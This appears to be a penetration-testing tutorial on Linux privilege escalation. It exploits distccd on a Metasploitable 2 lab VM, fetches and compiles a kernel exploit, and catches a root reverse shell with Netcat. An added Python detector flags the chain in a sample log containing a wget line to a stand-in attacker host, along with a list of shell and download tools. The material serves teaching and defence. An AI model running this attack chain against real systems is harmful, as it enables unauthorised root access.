Privilege escalation on Linux

In this section, we'll see how we can exploit a vulnerability in a Linux system and then escalate our privileges. We'll be using Metasploitable 2 as our target.

Before we can even think of privilege escalation, we must have at least normal-level access to the target system. In this case, our target system's IP address is 192.168.25.129. We start by running SPARTA to gather some quick information about our target. We add the target IP to the scope of the SPARTA scan, as shown in the following screenshot:

Once the SPARTA scan is complete, we know which services are running on our target system. Among them is distccd (as shown in the following screenshot), a distributed-computing service used for source-code compilation:

Now that we know the service to be exploited, we'll open up the Metasploit console to look for any exploits related to distcc:

Metasploit has an exploit named distcc_exec readily available. We list the parameters we need to configure using the show options command, then set the value of the RHOST (target) parameter and run the exploit command:

The exploit succeeds and presents us with a remote command shell. However, the shell has limited privileges, so we now need to escalate to root. Using the uname command, we learn that the target runs a Linux 2.6.x kernel, so we need to find a privilege-escalation exploit that suits this kernel version. We can search for specific exploits using the searchsploit utility. The following command lists the exploit we need:

searchsploit privilege | grep -i linux | grep -i kernel | grep 2.6 | grep 8572

We can now use the wget command on the target system to download the exploit, as shown in the following screenshot. Once it is downloaded, we compile the exploit on the target with the following command:

gcc -o exploit 8572.c

On our Kali Linux system, we start a Netcat listener on port 12345 using the following command:

nc -lvp 12345

As soon as the exploit is executed on the target system, we get a reverse shell on our Kali system with root privileges, as shown in the following screenshot. We have thus escalated our privileges from a normal user to root:
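From the defender's side, the attack chain above has a recognisable shape: a network-facing distccd process spawns a shell, which then runs a downloader and a compiler. The following added example (not from the book) walks a constructed process-execution log, reconstructs each process's ancestry, and flags shell, download, compile and Netcat activity whose ancestor is distccd; the log format and all PIDs, hosts and paths are assumptions made for the example.

```python
"""Flag the distccd -> shell -> wget -> gcc chain in a constructed exec log."""
from collections import namedtuple

Event = namedtuple("Event", "ts pid ppid user comm args")

# Constructed sample events in a simple exec-log shape:
# "<ts> <pid> <ppid> <user> <comm> <args>"  (hostname is a placeholder)
SAMPLE_LOG = """\
1 1200 1 daemon distccd /usr/bin/distccd --daemon --allow 0.0.0.0/0
2 1301 1200 daemon sh sh -c id
3 1302 1301 daemon wget wget http://ATTACKER_HOST/8572.c
4 1303 1301 daemon gcc gcc -o exploit 8572.c
5 1304 1301 daemon exploit ./exploit
6 1400 1 root cron /usr/sbin/cron
7 1401 1400 root sh sh -c run-parts /etc/cron.hourly
"""

# Binaries a compile server should never be spawning on its own
SUSPICIOUS = {"sh", "bash", "wget", "curl", "gcc", "cc", "nc", "netcat"}


def parse_log(text):
    """Turn the whitespace-separated log lines into Event tuples."""
    events = []
    for line in text.splitlines():
        ts, pid, ppid, user, comm, args = line.split(" ", 5)
        events.append(Event(int(ts), int(pid), int(ppid), user, comm, args))
    return events


def ancestors(pid, by_pid):
    """Yield the comm of pid and of every ancestor present in the log."""
    seen = set()  # guards against malformed logs with PID cycles
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        yield by_pid[pid].comm
        pid = by_pid[pid].ppid


def find_distcc_chains(events):
    """Return (ts, pid, comm, args) for suspicious processes under distccd."""
    by_pid = {e.pid: e for e in events}
    return [(e.ts, e.pid, e.comm, e.args) for e in events
            if e.comm in SUSPICIOUS and "distccd" in ancestors(e.ppid, by_pid)]


if __name__ == "__main__":
    for alert in find_distcc_chains(parse_log(SAMPLE_LOG)):
        print("ALERT distccd descendant:", alert)
```

The cron-spawned shell in the sample is deliberately left unflagged, since the rule keys on the distccd ancestry rather than on the shell itself.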
